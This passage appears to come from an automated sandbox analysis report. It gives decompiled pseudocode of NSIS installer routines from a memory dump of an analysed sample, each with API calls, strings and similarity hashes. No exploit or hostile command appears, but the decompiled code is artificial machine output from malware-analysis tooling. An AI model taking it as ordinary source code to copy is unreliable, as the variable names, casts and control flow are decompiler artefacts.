              						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
              					}
              					_t26 = lstrlenA(0x429878);
              					_a4 = _t26;
              					if(_a8 == 0) {
              						L6:
              						if((_v12 & 0x00000004) == 0) {
              							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
              						}
              						if((_v12 & 0x00000002) == 0) {
              							_v32 = 0x429878;
              							_v52 = 1;
              							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
              							_v44 = 0;
              							_v48 = _t29 - _t39;
              							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
              							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
              						}
              						if(_t39 != 0) {
              							_t28 = _a4;
              							 *((char*)(_t28 + 0x429878)) = 0;
              							return _t28;
              						}
              					} else {
              						_t26 =  &(_a4[lstrlenA(_a8)]);
              						if(_t26 < 0x800) {
              							_t26 = lstrcatA(0x429878, _a8);
              							goto L6;
              						}
              					}
              				}
              				return _t26;
              			}


              APIs
              • lstrlenA.KERNEL32(00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
              • lstrlenA.KERNEL32(00402FE9,00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
              • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,?,00007A7E), ref: 00404F0F
              • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
              • SendMessageA.USER32 ref: 00404F47
              • SendMessageA.USER32 ref: 00404F61
              • SendMessageA.USER32 ref: 00404F6F
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID:
              • API String ID: 2531174081-0
              • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
              • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
              • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
              • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404782(struct HWND__* _a4, intOrPtr _a8) {
              				long _v8;
              				signed char _v12;
              				unsigned int _v16;
              				void* _v20;
              				intOrPtr _v24;
              				long _v56;
              				void* _v60;
              				long _t15;
              				unsigned int _t19;
              				signed int _t25;
              				struct HWND__* _t28;
              
              				_t28 = _a4;
              				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
              				if(_a8 == 0) {
              					L4:
              					_v56 = _t15;
              					_v60 = 4;
              					SendMessageA(_t28, 0x110c, 0,  &_v60);
              					return _v24;
              				}
              				_t19 = GetMessagePos();
              				_v16 = _t19 >> 0x10;
              				_v20 = _t19;
              				ScreenToClient(_t28,  &_v20);
              				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
              				if((_v12 & 0x00000066) != 0) {
              					_t15 = _v8;
              					goto L4;
              				}
              				return _t25 | 0xffffffff;
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
              • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
              • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
              • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
              				char _v68;
              				int _t11;
              				int _t20;
              
              				if(_a8 == 0x110) {
              					SetTimer(_a4, 1, 0xfa, 0);
              					_a8 = 0x113;
              				}
              				if(_a8 == 0x113) {
              					_t20 =  *0x414c40;
              					_t11 =  *0x428c50;
              					if(_t20 >= _t11) {
              						_t20 = _t11;
              					}
              					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
              					SetWindowTextA(_a4,  &_v68);
              					SetDlgItemTextA(_a4, 0x406,  &_v68);
              				}
              				return 0;
              			}

              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
              • MulDiv.KERNEL32 ref: 00402BB4
              • wsprintfA.USER32 ref: 00402BC4
              • SetWindowTextA.USER32(?,?), ref: 00402BD4
              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
              Strings
              • verifying installer: %d%%, xrefs: 00402BBE
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: verifying installer: %d%%
              • API String ID: 1451636040-82062127
              • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
              • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
              • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
              • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405375(CHAR* _a4) {
              				struct _SECURITY_ATTRIBUTES _v16;
              				struct _SECURITY_DESCRIPTOR _v36;
              				long _t23;
              
              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
              				_v36.Owner = 0x40735c;
              				_v36.Group = 0x40735c;
              				_v36.Sacl = _v36.Sacl & 0x00000000;
              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
              				_v16.lpSecurityDescriptor =  &_v36;
              				_v36.Revision = 1;
              				_v36.Control = 4;
              				_v36.Dacl = 0x40734c;
              				_v16.nLength = 0xc;
              				if(CreateDirectoryA(_a4,  &_v16) != 0) {
              					L1:
              					return 0;
              				}
              				_t23 = GetLastError();
              				if(_t23 == 0xb7) {
              					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
              						goto L1;
              					}
              					return GetLastError();
              				}
              				return _t23;
              			}

              APIs
              • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004053B8
              • GetLastError.KERNEL32 ref: 004053CC
              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
              • GetLastError.KERNEL32 ref: 004053EB
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: Ls@$\s@
              • API String ID: 3449924974-4089078605
              • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
              • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405EE9(intOrPtr _a4) {
              				char _v292;
              				int _t10;
              				void* _t16;
              				void* _t21;
              
              				_t10 = GetSystemDirectoryA( &_v292, 0x104);
              				if(_t10 > 0x104) {
              					_t10 = 0;
              				}
              				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
              					_t16 = 1;
              				} else {
              					_t16 = 0;
              				}
              				_t5 = _t16 + 0x409010; // 0x5c
              				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
              				return LoadLibraryExA( &_v292, 0, 8);
              			}

              APIs
              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
              • wsprintfA.USER32 ref: 00405F39
              • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F4D
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%s.dll$UXTHEME$\
              • API String ID: 2200240437-4240819195
              • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
              • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405E29(CHAR* _a4) {
              				char _t5;
              				char _t7;
              				char* _t15;
              				char* _t16;
              				CHAR* _t17;
              
              				_t17 = _a4;
              				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
              					_t17 =  &(_t17[4]);
              				}
              				if( *_t17 != 0 && E00405727(_t17) != 0) {
              					_t17 =  &(_t17[2]);
              				}
              				_t5 =  *_t17;
              				_t15 = _t17;
              				_t16 = _t17;
              				if(_t5 != 0) {
              					do {
              						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
              							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
              							_t16 = CharNextA(_t16);
              						}
              						_t17 = CharNextA(_t17);
              						_t5 =  *_t17;
              					} while (_t5 != 0);
              				}
              				 *_t16 =  *_t16 & 0x00000000;
              				while(1) {
              					_t16 = CharPrevA(_t15, _t16);
              					_t7 =  *_t16;
              					if(_t7 != 0x20 && _t7 != 0x5c) {
              						break;
              					}
              					 *_t16 =  *_t16 & 0x00000000;
              					if(_t15 < _t16) {
              						continue;
              					}
              					break;
              				}
              				return _t7;
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Char$Next$Prev
              • String ID: *?|<>/":
              • API String ID: 589700163-165019052
              • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
              • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
              • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
              • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E00401751(FILETIME* __ebx, void* __eflags) {
              				void* _t33;
              				void* _t41;
              				void* _t43;
              				FILETIME* _t49;
              				FILETIME* _t62;
              				void* _t64;
              				signed int _t70;
              				FILETIME* _t71;
              				FILETIME* _t75;
              				signed int _t77;
              				void* _t80;
              				CHAR* _t82;
              				void* _t85;
              
              				_t75 = __ebx;
              				_t82 = E00402A29(0x31);
              				 *(_t85 - 0xc) = _t82;
              				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
              				_t33 = E00405727(_t82);
              				_push(_t82);
              				if(_t33 == 0) {
              					lstrcatA(E004056BA(E00405BC7(0x409c40, 0x434800)), ??);
              				} else {
              					_push(0x409c40);
              					E00405BC7();
              				}
              				E00405E29(0x409c40);
              				while(1) {
              					__eflags =  *(_t85 + 8) - 3;
              					if( *(_t85 + 8) >= 3) {
              						_t64 = E00405EC2(0x409c40);
              						_t77 = 0;
              						__eflags = _t64 - _t75;
              						if(_t64 != _t75) {
              							_t71 = _t64 + 0x14;
              							__eflags = _t71;
              							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
              						}
              						asm("sbb eax, eax");
              						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
              						__eflags = _t70;
              						 *(_t85 + 8) = _t70;
              					}
              					__eflags =  *(_t85 + 8) - _t75;
              					if( *(_t85 + 8) == _t75) {
              						E0040587F(0x409c40);
              					}
              					__eflags =  *(_t85 + 8) - 1;
              					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
              					__eflags = _t41 - 0xffffffff;
              					 *(_t85 - 8) = _t41;
              					if(_t41 != 0xffffffff) {
              						break;
              					}
              					__eflags =  *(_t85 + 8) - _t75;
              					if( *(_t85 + 8) != _t75) {
              						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
              						__eflags =  *(_t85 + 8) - 2;
              						if(__eflags == 0) {
              							 *((intOrPtr*)(_t85 - 4)) = 1;
              						}
              						L31:
              						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
              						__eflags =  *0x42eca8;
              						goto L32;
              					} else {
              						E00405BC7(0x40a440, 0x42f000);
              						E00405BC7(0x42f000, 0x409c40);
              						E00405BE9(_t75, 0x40a440, 0x409c40, 0x40a040,  *((intOrPtr*)(_t85 - 0x14)));
              						E00405BC7(0x42f000, 0x40a440);
              						_t62 = E00405488(0x40a040,  *(_t85 - 0x28) >> 3) - 4;
              						__eflags = _t62;
              						if(_t62 == 0) {
              							continue;
              						} else {
              							__eflags = _t62 == 1;
              							if(_t62 == 1) {
              								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
              								L32:
              								_t49 = 0;
              								__eflags = 0;
              							} else {
              								_push(0x409c40);
              								_push(0xfffffffa);
              								E00404EB3();
              								L29:
              								_t49 = 0x7fffffff;
              							}
              						}
              					}
              					L33:
              					return _t49;
              				}
              				E00404EB3(0xffffffea,  *(_t85 - 0xc));
              				 *0x42ecd4 =  *0x42ecd4 + 1;
              				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75);
              				 *0x42ecd4 =  *0x42ecd4 - 1;
              				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
              				_t80 = _t43;
              				if( *(_t85 - 0x1c) != 0xffffffff) {
              					L22:
              					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c);
              				} else {
              					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
              					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
              						goto L22;
              					}
              				}
              				CloseHandle( *(_t85 - 8));
              				__eflags = _t80 - _t75;
              				if(_t80 >= _t75) {
              					goto L31;
              				} else {
              					__eflags = _t80 - 0xfffffffe;
              					if(_t80 != 0xfffffffe) {
              						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
              					} else {
              						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
              						lstrcatA(0x409c40,  *(_t85 - 0xc));
              					}
              					_push(0x200010);
              					_push(0x409c40);
              					E00405488();
              					goto L29;
              				}
              				goto L33;
              			}

              APIs
              • lstrcatA.KERNEL32(00000000,00000000,00409C40,00434800,00000000,00000000,00000031), ref: 00401790
              • CompareFileTime.KERNEL32(-00000014,?,00409C40,00409C40,00000000,00000000,00409C40,00434800,00000000,00000000,00000031), ref: 004017BA
                • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,0042E420,NSIS Error), ref: 00405BD4
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,?,00007A7E), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID:
              • API String ID: 1941528284-0
              • Opcode ID: 870905d4944f23dd78321023e111c3e0b55a0fecf5618fac61138b28aecf7b02
              • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
              • Opcode Fuzzy Hash: 870905d4944f23dd78321023e111c3e0b55a0fecf5618fac61138b28aecf7b02
              • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 84%
              			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
              				void* _v8;
              				char _v272;
              				long _t18;
              				intOrPtr* _t27;
              				long _t28;
              
              				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42ecd0 | 0x00000008,  &_v8);
              				if(_t18 == 0) {
              					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
              						if(_a12 != 0) {
              							RegCloseKey(_v8);
              							L8:
              							return 1;
              						}
              						if(E00402A69(_v8,  &_v272, 0) != 0) {
              							break;
              						}
              					}
              					RegCloseKey(_v8);
              					_t27 = E00405F57(4);
              					if(_t27 == 0) {
              						if( *0x42ecd0 != 0) {
              							goto L8;
              						}
              						_t28 = RegDeleteKeyA(_a4, _a8);
              						if(_t28 != 0) {
              							goto L8;
              						}
              						return _t28;
              					}
              					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
              				}
              				return _t18;
              			}

              APIs
              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
              • RegCloseKey.ADVAPI32(?), ref: 00402ACF
              • RegCloseKey.ADVAPI32(?), ref: 00402AF4
              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Close$DeleteEnumOpen
              • String ID:
              • API String ID: 1912718029-0
              • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
              • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00401CDE(int __edx) {
              				void* _t17;
              				struct HINSTANCE__* _t21;
              				struct HWND__* _t25;
              				void* _t27;
              
              				_t25 = GetDlgItem( *(_t27 - 8), __edx);
              				GetClientRect(_t25, _t27 - 0x50);
              				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
              				if(_t17 != _t21) {
              					DeleteObject(_t17);
              				}
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
              				return 0;
              			}








              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 020452eb3921661a00a7f1dec221df2f45b9b93871aa410a8c2cf6622bf1c573
              • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
              • Opcode Fuzzy Hash: 020452eb3921661a00a7f1dec221df2f45b9b93871aa410a8c2cf6622bf1c573
              • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
              				char _v36;
              				char _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t21;
              				signed int _t22;
              				void* _t29;
              				void* _t31;
              				void* _t32;
              				void* _t41;
              				signed int _t43;
              				signed int _t47;
              				signed int _t50;
              				signed int _t51;
              				signed int _t53;
              
              				_t21 = _a16;
              				_t51 = _a12;
              				_t41 = 0xffffffdc;
              				if(_t21 == 0) {
              					_push(0x14);
              					_pop(0);
              					_t22 = _t51;
              					if(_t51 < 0x100000) {
              						_push(0xa);
              						_pop(0);
              						_t41 = 0xffffffdd;
              					}
              					if(_t51 < 0x400) {
              						_t41 = 0xffffffde;
              					}
              					if(_t51 < 0xffff3333) {
              						_t50 = 0x14;
              						asm("cdq");
              						_t22 = 1 / _t50 + _t51;
              					}
              					_t23 = _t22 & 0x00ffffff;
              					_t53 = _t22 >> 0;
              					_t43 = 0xa;
              					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
              				} else {
              					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
              					_t47 = 0;
              				}
              				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
              				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
              				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
              				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
              				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
              			}




















              APIs
              • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
              • wsprintfA.USER32 ref: 0040471E
              • SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s
              • API String ID: 3540041739-3551169577
              • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
              • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
              • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
              • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 51%
              			E00401BCA() {
              				signed int _t28;
              				CHAR* _t31;
              				long _t32;
              				int _t37;
              				signed int _t38;
              				int _t42;
              				int _t48;
              				struct HWND__* _t52;
              				void* _t55;
              
              				 *(_t55 - 8) = E00402A0C(3);
              				 *(_t55 + 8) = E00402A0C(4);
              				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
              					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
              				}
              				__eflags =  *(_t55 - 0x14) & 0x00000002;
              				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
              					 *(_t55 + 8) = E00402A29(0x44);
              				}
              				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
              				_push(1);
              				if(__eflags != 0) {
              					_t50 = E00402A29();
              					_t28 = E00402A29();
              					asm("sbb ecx, ecx");
              					asm("sbb eax, eax");
              					_t31 =  ~( *_t27) & _t50;
              					__eflags = _t31;
              					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
              					goto L10;
              				} else {
              					_t52 = E00402A0C();
              					_t37 = E00402A0C();
              					_t48 =  *(_t55 - 0x14) >> 2;
              					if(__eflags == 0) {
              						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
              						L10:
              						 *(_t55 - 0xc) = _t32;
              					} else {
              						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
              						asm("sbb eax, eax");
              						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
              					}
              				}
              				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
              				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
              					_push( *(_t55 - 0xc));
              					E00405B25();
              				}
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
              				return 0;
              			}













              APIs
              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
              • SendMessageA.USER32 ref: 00401C42
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
              • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
              • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
